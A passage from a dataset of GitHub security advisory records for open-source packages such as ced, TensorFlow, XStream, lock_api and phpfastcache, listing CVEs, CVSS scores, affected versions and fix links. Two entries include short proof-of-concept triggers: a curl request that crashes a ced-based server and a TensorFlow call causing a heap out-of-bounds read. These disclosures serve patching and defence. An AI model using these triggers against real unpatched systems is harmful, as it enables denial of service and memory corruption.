Additionally using +reference types for the keys or values will lead to the segmentation faults +in the crate's code.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'appendix'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.2.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36469'}, {'type': 'WEB', 'url': 'https://github.com/krl/appendix/issues/6'}, {'type': 'PACKAGE', 'url': 'https://github.com/krl/appendix'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0149.html'}]","{'cwe_ids': ['CWE-362'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-18T20:35:37Z', 'nvd_published_at': '2021-08-08T06:15:00Z'}" +1.4.0,GHSA-5wg8-7c9q-794v,2021-08-19T18:59:40Z,2021-08-25T20:50:00Z,,['CVE-2020-35912'],Data races in lock_api,An issue was discovered in the lock_api crate before 0.4.2 for Rust. A data race can occur because of MappedRwLockWriteGuard unsoundness.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'lock_api'}, 'ecosystem_specific': {'affected_functions': ['lock_api::MappedRwLockWriteGuard']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.4.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35912'}, {'type': 'WEB', 'url': 'https://github.com/Amanieu/parking_lot/pull/262'}, {'type': 'PACKAGE', 'url': 'https://github.com/Amanieu/parking_lot'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0070.html'}]","{'cwe_ids': ['CWE-362'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T18:59:40Z', 'nvd_published_at': None}" +1.4.0,GHSA-m9m5-cg5h-r582,2023-06-13T20:01:40Z,2021-08-25T20:50:24Z,,['CVE-2020-35926'],Improper random number generation in nanorand,"In versions of nanorand prior to 0.5.1, RandomGen implementations for standard unsigned integers could fail to properly generate numbers, due to using bit-shifting to truncate a 64-bit number, rather than just an as conversion. This often manifested as RNGs returning nothing but 0, including the cryptographically secure ChaCha random number generator.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'nanorand'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.5.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35926'}, {'type': 'WEB', 'url': 'https://github.com/Absolucy/nanorand-rs/commit/5ba218ac29df4786b002d7d12b47fa0c04a331f2'}, {'type': 'PACKAGE', 'url': 'https://github.com/Absolucy/nanorand-rs'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0089.html'}, {'type': 'WEB', 'url': 'https://twitter.com/aspenluxxxy/status/1336684692284772352'}]","{'cwe_ids': ['CWE-338'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T18:55:41Z', 'nvd_published_at': None}" +1.4.0,GHSA-3xg5-6c3j-vp8x,2021-08-26T17:42:07Z,2021-08-30T16:23:34Z,,['CVE-2020-18703'],Improper Restriction of XML External Entity Reference in Quokka,XML External Entities (XXE) in Quokka v0.4.0 allows remote attackers to execute arbitrary code via the component 'quokka/utils/atom.py'.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'quokka'}, 'ecosystem_specific': {'affected_functions': ['quokka.admin.wtforms_html5.set_title']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.4.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-18703'}, {'type': 'WEB', 'url': 'https://github.com/rochacbruno/quokka/issues/676'}, {'type': 'PACKAGE', 'url': '://github.com/rochacbruno/quokka'}]","{'cwe_ids': ['CWE-611'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-26T17:42:07Z', 'nvd_published_at': '2021-08-16T18:15:00Z'}" +1.4.0,GHSA-cvh5-p6r6-g2qc,2021-08-26T20:11:49Z,2021-08-30T16:13:40Z,,['CVE-2021-37704'],Exposed phpinfo() leadked via documentation files,"### Impact +The `phpinfo()` can be exposed if the `/vendor` is not protected from public access. This is a rare situation today since the vendor directory is often located outside the web directory or protected via server rule (.htaccess, etc). + +### Patches +Only the v6, v7 and v8 will be patched respectively in 8.0.7, 7.1.2, 6.1.5. +Older versions such as v5, v4 are not longer supported and will **NOT** be patched. + +### Workarounds +Protect the `/vendor` directory from public access. + +### References +The first issue revealing this vulnerability is located here: https://github.com/flextype/flextype/issues/567 +V6 fix: https://github.com/PHPSocialNetwork/phpfastcache/pull/815 +V7 fix: https://github.com/PHPSocialNetwork/phpfastcache/pull/814 +V8 fix: https://github.com/PHPSocialNetwork/phpfastcache/pull/813 + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [our issue tracker](https://github.com/PHPSocialNetwork/phpfastcache/issues) +* Email us at [security@geolim4.com](mailto:security@geolim4.com) +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:L'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'phpfastcache/phpfastcache'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.1.5'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'phpfastcache/phpfastcache'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.1.2'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'phpfastcache/phpfastcache'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0'}, {'fixed': '8.0.7'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/PHPSocialNetwork/phpfastcache/security/advisories/GHSA-cvh5-p6r6-g2qc'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37704'}, {'type': 'WEB', 'url': 'https://github.com/flextype/flextype/issues/567'}, {'type': 'WEB', 'url': 'https://github.com/PHPSocialNetwork/phpfastcache/pull/813'}, {'type': 'WEB', 'url': 'https://github.com/PHPSocialNetwork/phpfastcache/pull/814'}, {'type': 'WEB', 'url': 'https://github.com/PHPSocialNetwork/phpfastcache/pull/815'}, {'type': 'WEB', 'url': 'https://github.com/PHPSocialNetwork/phpfastcache/commit/41a77d0d8f126dbd6fbedcd9e6a82e86cdaafa51'}, {'type': 'WEB', 'url': 'https://github.com/PHPSocialNetwork/phpfastcache/blob/master/CHANGELOG.md#807'}, {'type': 'WEB', 'url': 'https://packagist.org/packages/phpfastcache/phpfastcache'}]","{'cwe_ids': ['CWE-200', 'CWE-668'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-26T20:11:49Z', 'nvd_published_at': '2021-08-12T20:15:00Z'}" +1.4.0,GHSA-4q4x-67hx-5mpg,2023-06-13T17:43:58Z,2021-08-25T20:44:08Z,,['CVE-2019-15545'],Failure to properly verify ed25519 signatures in libp2p-core,Affected versions of this crate did not properly verify ed25519 signatures. Any signature with a correct length was considered valid. This allows an attacker to impersonate any node identity.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'libp2p-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.8.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-15545'}, {'type': 'PACKAGE', 'url': 'https://github.com/libp2p/rust-libp2p'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2019-0004.html'}]","{'cwe_ids': ['CWE-347'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:23:31Z', 'nvd_published_at': None}" +1.4.0,GHSA-r88h-6987-g79f,2023-06-13T21:54:46Z,2021-08-25T21:00:28Z,,[],Data races on syncpool,"Affected versions of this crate unconditionally implements `Send` for `Bucket2`. This allows sending non-Send types to other threads. + +This can lead to data races when non Send types like `Cell` or `Rc` are contained inside `Bucket2` and sent across thread boundaries. The data races can potentially lead to memory corruption (as demonstrated in the PoC from the original report issue). + +The flaw was corrected in commit `15b2828` by adding a `T: Send` bound to the `Send` impl of `Bucket2`. +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'syncpool'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.1.6'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/Chopinsky/byte_buffer/issues/2'}, {'type': 'WEB', 'url': 'https://github.com/Chopinsky/byte_buffer/commit/15b282877d1e576de2b337d8162bbf43ed1a0f2d'}, {'type': 'PACKAGE', 'url': 'https://github.com/Chopinsky/byte_buffer/tree/master/syncpool'}, {'type': 'WEB', 'url': 'https://github.com/RustSec/advisory-db/blob/main/crates/syncpool/RUSTSEC-2020-0142.md'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0142.html'}]","{'cwe_ids': ['CWE-362'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-05T22:09:21Z', 'nvd_published_at': None}" +1.4.0,GHSA-98hv-qff3-8793,2021-08-26T19:20:22Z,2021-08-30T16:24:08Z,,['CVE-2020-18704'],Unrestricted Upload of File with Dangerous Type in django-widgy,Unrestricted Upload of File with Dangerous Type in Django-Widgy v0.8.4 allows remote attackers to execute arbitrary code via the 'image' widget in the component 'Change Widgy Page'.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'django-widgy'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.9.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-18704'}, {'type': 'WEB', 'url': 'https://github.com/fusionbox/django-widgy/issues/387'}, {'type': 'PACKAGE', 'url': 'https://github.com/fusionbox/django-widgy'}]","{'cwe_ids': ['CWE-434'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-26T19:20:22Z', 'nvd_published_at': '2021-08-16T18:15:00Z'}" +1.4.0,GHSA-27wq-qx3q-fxm9,2021-10-21T14:15:51Z,2021-08-23T19:42:28Z,,['CVE-2021-39131'],Improper Handling of Unexpected Data Type in ced,"### Impact + +In ced v0.1.0, passing data types other than `Buffer` causes the Node.js process to crash. + +### Patches + +The problem has been patched in [ced v1.0.0](https://github.com/sonicdoe/ced/releases/tag/v1.0.0). You can upgrade from v0.1.0 without any breaking changes. + +### Workarounds + +Before passing an argument to ced, verify it’s a `Buffer` using [`Buffer.isBuffer(obj)`](https://nodejs.org/api/buffer.html#buffer_static_method_buffer_isbuffer_obj). + +### CVSS score + +[CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/RL:O/RC:C](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/RL:O/RC:C) + +Base Score: 7.5 (High) +Temporal Score: 7.2 (High) + +Since ced is a library, the scoring is based on the “[reasonable worst-case implementation scenario](https://www.first.org/cvss/v3.1/user-guide#3-7-Scoring-Vulnerabilities-in-Software-Libraries-and-Similar)”, namely, accepting data from untrusted sources over a network and passing it directly to ced. Depending on your specific implementation, the vulnerability’s severity in your program may be different. + +### Proof of concept + +```js +const express = require(""express""); +const bodyParser = require(""body-parser""); +const ced = require(""ced""); + +const app = express(); + +app.use(bodyParser.raw()); + +app.post(""/"", (req, res) => { + const encoding = ced(req.body); + + res.end(encoding); +}); + +app.listen(3000); +``` + +`curl --request POST --header ""Content-Type: text/plain"" --data foo http://localhost:3000` crashes the server. + +### References + +- https://github.com/sonicdoe/ced/commit/a4d9f10b6bf1cd468d1a5b9a283cdf437f8bb7b3","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'ced'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/sonicdoe/ced/security/advisories/GHSA-27wq-qx3q-fxm9'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-39131'}, {'type': 'WEB', 'url': 'https://github.com/sonicdoe/ced/commit/a4d9f10b6bf1cd468d1a5b9a283cdf437f8bb7b3'}, {'type': 'PACKAGE', 'url': 'https://github.com/sonicdoe/ced'}, {'type': 'WEB', 'url': 'https://github.com/sonicdoe/ced/releases/tag/v1.0.0'}]","{'cwe_ids': ['CWE-241'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-23T17:18:32Z', 'nvd_published_at': '2021-08-17T23:15:00Z'}" +1.4.0,GHSA-9c8h-vvrj-w2p8,2021-08-23T18:35:20Z,2021-08-25T14:43:59Z,,['CVE-2021-37641'],Heap OOB in `RaggedGather`,"### Impact +If the arguments to `tf.raw_ops.RaggedGather` don't determine a valid ragged tensor code can trigger a read from outside of bounds of heap allocated buffers. + +```python +import tensorflow as tf + +tf.raw_ops.RaggedGather( + params_nested_splits = [0,0,0], + params_dense_values = [1,1], + indices = [0,0,9,0,0], + OUTPUT_RAGGED_RANK=0) +``` + +In debug mode, the same code triggers a `CHECK` failure. + +The [implementation](https://github.com/tensorflow/tensorflow/blob/8d72537c6abf5a44103b57b9c2e22c14f5f49698/tensorflow/core/kernels/ragged_gather_op.cc#L70) directly reads the first dimension of a tensor shape before checking that said tensor has rank of at least 1 (i.e., it is not a scalar). Furthermore, the implementation does not check that the list given by `params_nested_splits` is not an empty list of tensors. + +### Patches +We have patched the issue in GitHub commit [a2b743f6017d7b97af1fe49087ae15f0ac634373](https://github.com/tensorflow/tensorflow/commit/a2b743f6017d7b97af1fe49087ae15f0ac634373). + +The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-9c8h-vvrj-w2p8'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37641'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/a2b743f6017d7b97af1fe49087ae15f0ac634373'}]","{'cwe_ids': ['CWE-125'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-23T18:35:20Z', 'nvd_published_at': '2021-08-12T21:15:00Z'}" +1.4.0,GHSA-xmr7-v725-2jjr,2023-03-22T20:54:46Z,2021-08-25T20:52:12Z,,['CVE-2021-27671'],Cross site scripting in comrak,"An issue was discovered in the comrak crate before 0.9.1 for Rust. Cross site scripting (XSS) can occur because the protection mechanism for data: and javascript: URIs is case-sensitive, allowing (for example) Data: to be used in an attack.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'comrak'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.9.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-27671'}, {'type': 'WEB', 'url': 'https://github.com/kivikakk/comrak/commit/b3efbb6e427bcd33bb14db45753ad4fd98e0f5bf'}, {'type': 'PACKAGE', 'url': 'https://github.com/kivikakk/comrak'}, {'type': 'WEB', 'url': 'https://github.com/kivikakk/comrak/releases/tag/0.9.1'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0026.html'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T17:34:25Z', 'nvd_published_at': None}" +1.4.0,GHSA-2jfv-g3fh-xq3v,2023-06-13T21:56:58Z,2021-08-25T20:46:54Z,,['CVE-2020-35875'],Excessive memory usage in tokio-rustls,"tokio-rustls does not call process_new_packets immediately after read, so the expected termination condition wants_read always returns true. As long as new incoming data arrives faster than it is processed and the reader does not return pending, data will be buffered. This may cause DoS.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'tokio-rustls'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.12.0'}, {'fixed': '0.12.3'}]}]}, {'package': {'ecosystem': 'crates.io', 'name': 'tokio-rustls'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.13.0'}, {'fixed': '0.13.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35875'}, {'type': 'WEB', 'url': 'https://github.com/tokio-rs/tls/pull/14'}, {'type': 'PACKAGE', 'url': 'https://github.com/tokio-rs/tls'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0019.html'}]","{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:19:01Z', 'nvd_published_at': None}" +1.4.0,GHSA-5fg8-2547-mr8q,2022-01-04T19:36:30Z,2021-08-03T16:57:05Z,,['CVE-2021-32796'],Misinterpretation of malicious XML input,"### Impact +xmldom versions 0.6.0 and older do not correctly escape special characters when serializing elements removed from their ancestor. This may lead to unexpected syntactic changes during XML processing in some downstream applications. + +### Patches +Update to one of the fixed versions of `@xmldom/xmldom` (`>=0.7.0`) + +See issue #271 for the status of publishing `xmldom` to npm or join #270 for Q&A/discussion until it's resolved. + +### Workarounds + +Downstream applications can validate the input and reject the maliciously crafted documents. + +### References + +Similar to this one reported on the Go standard library: + +- https://mattermost.com/blog/coordinated-disclosure-go-xml-vulnerabilities/ +- https://mattermost.com/blog/securing-xml-implementations-across-the-web/ + +### For more information + +If you have any questions or comments about this advisory: + +* Open an issue in [`xmldom/xmldom`](https://github.com/xmldom/xmldom) +* Email us: send an email to **all** addresses that are shown by `npm owner ls @xmldom/xmldom` +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'xmldom'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.7.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/xmldom/xmldom/security/advisories/GHSA-5fg8-2547-mr8q'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32796'}, {'type': 'WEB', 'url': 'https://github.com/xmldom/xmldom/commit/7b4b743917a892d407356e055b296dcd6d107e8b'}, {'type': 'PACKAGE', 'url': 'https://github.com/xmldom/xmldom'}, {'type': 'WEB', 'url': 'https://mattermost.com/blog/coordinated-disclosure-go-xml-vulnerabilities/'}, {'type': 'WEB', 'url': 'https://mattermost.com/blog/securing-xml-implementations-across-the-web/'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/@xmldom/xmldom'}]","{'cwe_ids': ['CWE-116'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-02T23:21:11Z', 'nvd_published_at': '2021-07-27T22:15:00Z'}" +1.4.0,GHSA-hwfp-hg2m-9vr2,2023-08-31T15:59:55Z,2021-08-09T20:43:44Z,,['CVE-2021-32559'],Integer overflow in pywin32,An integer overflow exists in pywin32 prior to version b301 when adding an access control entry (ACE) to an access control list (ACL) that would cause the size to be greater than 65535 bytes. An attacker who successfully exploited this vulnerability could crash the vulnerable process.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'pywin32'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '301'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32559'}, {'type': 'WEB', 'url': 'https://github.com/mhammond/pywin32/issues/1700'}, {'type': 'WEB', 'url': 'https://github.com/mhammond/pywin32/pull/1701'}, {'type': 'WEB', 'url': 'https://github.com/fireeye/Vulnerability-Disclosures/blob/master/FEYE-2021-0017/FEYE-2021-0017.md'}, {'type': 'PACKAGE', 'url': 'https://github.com/mhammond/pywin32'}, {'type': 'WEB', 'url': 'https://github.com/mhammond/pywin32/releases'}]","{'cwe_ids': ['CWE-190'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-07-07T16:45:27Z', 'nvd_published_at': '2021-07-06T12:15:00Z'}" +1.4.0,GHSA-h7v4-7xg3-hxcc,2022-02-08T20:58:51Z,2021-08-25T14:47:46Z,,['CVE-2021-39147'],XStream is vulnerable to an Arbitrary Code Execution attack,"### Impact +The vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. + +### Patches +XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose. + +### Workarounds +See [workarounds](https://x-stream.github.io/security.html#workaround) for the different versions covering all CVEs. + +### References +See full information about the nature of the vulnerability and the steps to reproduce it in XStream's documentation for [CVE-2021-39147](https://x-stream.github.io/CVE-2021-39147.html). + +### Credits +wh1t3p1g from TSRC (Tencent Security Response Center) found and reported the issue to XStream and provided the required information to reproduce it. + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [XStream](https://github.com/x-stream/xstream/issues) +* Contact us at [XStream Google Group](https://groups.google.com/group/xstream-user) +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.thoughtworks.xstream:xstream'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.18'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/x-stream/xstream/security/advisories/GHSA-h7v4-7xg3-hxcc'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-39147'}, {'type': 'PACKAGE', 'url': 'https://github.com/x-stream/xstream'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/09/msg00017.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/22KVR6B5IZP3BGQ3HPWIO2FWWCKT3DHP/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PVPHZA7VW2RRSDCOIPP2W6O5ND254TU7/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QGXIU3YDPG6OGTDHMBLAFN7BPBERXREB/'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210923-0003/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-5004'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}, {'type': 'WEB', 'url': 'https://x-stream.github.io/CVE-2021-39147.html'}]","{'cwe_ids': ['CWE-502'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-23T18:22:16Z', 'nvd_published_at': '2021-08-23T18:15:00Z'}" +1.4.0,GHSA-hj9h-wrgg-hgmx,2021-08-19T18:59:37Z,2021-08-25T20:50:02Z,,['CVE-2020-35913'],Data races in lock_api,An issue was discovered in the lock_api crate before 0.4.2 for Rust. A data race can occur because of RwLockReadGuard unsoundness.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'lock_api'}, 'ecosystem_specific': {'affected_functions': ['lock_api::RwLockReadGuard']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.4.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35913'}, {'type': 'WEB', 'url': 'https://github.com/Amanieu/parking_lot/pull/262'}, {'type': 'PACKAGE', 'url': 'https://github.com/Amanieu/parking_lot'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0070.html'}]","{'cwe_ids': ['CWE-362'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T18:59:37Z', 'nvd_published_at': None}" +1.4.0,GHSA-c3m3-c39q-pv23,2023-06-13T20:56:39Z,2021-08-25T20:44:10Z,,['CVE-2019-15543'],Out of bounds write in slice-deque,"Affected versions of this crate entered a corrupted state if mem::size_of::() % allocation_granularity() != 0 and a specific allocation pattern was used: sufficiently shifting the deque elements over the mirrored page boundary. + +This allows an attacker that controls controls both element insertion and removal to corrupt the deque, such that reading elements from it would read bytes corresponding to other elements in the deque. (e.g. a read of T could read some bytes from one value and some bytes from an adjacent one, resulting in a T whose value representation is not meaningful). This is undefined behavior. + +The flaw was corrected by using a pair of pointers to track the head and tail of the deque instead of a pair of indices. This pair of pointers are represented using a Rust slice.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'slice-deque'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.2.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-15543'}, {'type': 'WEB', 'url': 'https://github.com/gnzlbg/slice_deque/issues/57'}, {'type': 'PACKAGE', 'url': 'https://github.com/gnzlbg/slice_deque'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2019-0002.html'}]","{'cwe_ids': ['CWE-787'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': 